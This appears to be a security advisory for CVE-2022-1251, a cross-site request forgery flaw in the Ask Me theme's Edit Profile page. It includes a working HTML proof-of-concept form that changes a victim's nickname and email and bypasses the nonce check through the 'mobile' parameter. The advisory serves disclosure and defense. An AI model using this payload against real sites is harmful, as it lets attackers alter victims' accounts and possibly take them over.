Ask Me < 6.8.4 – CSRF in Edit Profile | CVE 2022-1251

Description

The theme does not perform nonce checks when processing POST requests to the Edit Profile page, allowing an attacker to trick a user to change their profile information by sending a crafted request.

Version 6.8.2 introduced nonce checks, but these are bypassed when the 'mobile' parameter is passed as well.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/edit-profile/" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="nickname" value="Evil Ottar" />
      <input type="hidden" name="email" value="dr.evil@example.com" />
      <input type="hidden" name="user_action" value="edit_profile" />

      <!-- Version 6.8.2 introduces a nonce, but checking it is bypassed if 'mobile' is not empty. -->
      <input type="hidden" name="mobile" value="1" />

      <input type="submit" value="Save" />
    </form>
  </body>
</html>